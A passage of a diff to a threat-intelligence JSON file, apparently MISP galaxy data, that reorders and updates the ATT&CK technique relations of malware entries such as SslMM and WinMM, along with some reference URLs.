"type": "uses" }, { - "dest-uuid": "9b52fca7-1a36-4da0-b62d-da5bd83b4d69", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03259939-0b57-482f-8eb5-87c0e0d54334", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8864,7 +10547,70 @@ "type": "uses" }, { - "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03259939-0b57-482f-8eb5-87c0e0d54334", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8885,7 +10631,7 @@ "type": "uses" }, { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8897,13 +10643,6 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "8ae43c46-57ef-47d5-a77a-eebb35628db2", @@ -8951,6 +10690,20 @@ ], "type": "uses" }, + { + "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", "tags": [ @@ -8958,6 +10711,27 @@ ], "type": "uses" }, + { + "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9b52fca7-1a36-4da0-b62d-da5bd83b4d69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ @@ -8972,27 +10746,6 @@ ], "type": "uses" }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "4eeaf8a9-c86b-4954-a663-9555fb406466", "tags": [ @@ -9000,27 +10753,6 @@ ], "type": "uses" }, - { - "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ @@ -9028,6 +10760,13 @@ ], "type": "uses" }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", "tags": [ @@ -9043,42 +10782,7 @@ "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9b52fca7-1a36-4da0-b62d-da5bd83b4d69", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9092,7 +10796,42 @@ "type": "uses" }, { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9136,14 +10875,14 @@ "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9180,13 +10919,6 @@ ], "type": "uses" }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ @@ -9194,34 +10926,6 @@ ], "type": "uses" }, - { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ @@ -9230,14 +10934,14 @@ "type": "uses" }, { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9250,12 +10954,54 @@ ], "type": "uses" }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "e6ef745b-077f-42e1-a37d-29eecff9c754", @@ -9285,7 +11031,7 @@ "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9299,7 +11045,7 @@ "type": "uses" }, { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9355,34 +11101,6 @@ ], "type": "uses" }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ @@ -9390,27 +11108,6 @@ ], "type": "uses" }, - { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ @@ -9418,12 +11115,61 @@ ], "type": "uses" }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "96b08451-b27a-4ff6-893f-790e26393a8e", @@ -9467,14 +11213,14 @@ "type": "uses" }, { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9536,14 +11282,14 @@ "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9583,6 +11329,13 @@ ], "type": "uses" }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ @@ -9596,13 +11349,6 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "8c553311-0baa-4146-997a-f79acef3d831", @@ -9617,7 +11363,7 @@ ], "refs": [ "https://attack.mitre.org/software/S0058", - "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf" + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf" ], "synonyms": [ "SslMM" @@ -9639,14 +11385,7 @@ "type": "uses" }, { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9659,6 +11398,13 @@ ], "type": "uses" }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ @@ -9667,7 +11413,14 @@ "type": "uses" }, { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9680,13 +11433,6 @@ ], "type": "uses" }, - { - "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", "tags": [ @@ -9706,8 +11452,7 @@ "Windows" ], "refs": [ - "https://attack.mitre.org/software/S0059", - "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf" + "https://attack.mitre.org/software/S0059" ], "synonyms": [ "WinMM" @@ -9735,13 +11480,6 @@ ], "type": "uses" }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", "tags": [ @@ -9750,7 +11488,7 @@ "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9762,6 +11500,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "22addc7b-b39f-483d-979a-1b35147da5de", @@ -9791,7 +11536,7 @@ "type": "uses" }, { - "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9805,7 +11550,7 @@ "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9853,14 +11598,14 @@ "type": "uses" }, { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -9893,13 +11638,6 @@ ], "type": "uses" }, - { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ @@ -9907,41 +11645,6 @@ ], "type": "uses" }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ @@ -9949,12 +11652,54 @@ ], "type": "uses" }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "166c0eca-02fd-424a-92c0-6b5106994d31", @@ -9984,14 +11729,14 @@ "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10026,7 +11771,7 @@ "type": "uses" }, { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10040,14 +11785,7 @@ "type": "uses" }, { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "84e02621-8fdf-470f-bd58-993bb6a89d91", + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10059,6 +11797,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "84e02621-8fdf-470f-bd58-993bb6a89d91", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "d69c8146-ab35-4d50-8382-6fc80e641d43", @@ -10088,14 +11833,14 @@ "type": "uses" }, { - "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10142,6 +11887,13 @@ ], "type": "uses" }, + { + "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ @@ -10155,13 +11907,6 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "dfb5fa9b-3051-4b97-8035-08f80aef945b", @@ -10187,34 +11932,6 @@ ], "type": "uses" }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "5e4a2073-9643-44cb-a0b5-e7f4048446c7", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ @@ -10230,7 +11947,14 @@ "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "5e4a2073-9643-44cb-a0b5-e7f4048446c7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10242,6 +11966,27 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "463f68f1-5cde-4dc2-a831-68b73488f8f4", @@ -10277,6 +12022,13 @@ ], "type": "uses" }, + { + "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", "tags": [ @@ -10291,13 +12043,6 @@ ], "type": "uses" }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ @@ -10306,7 +12051,21 @@ "type": "uses" }, { - "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10325,20 +12084,6 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - 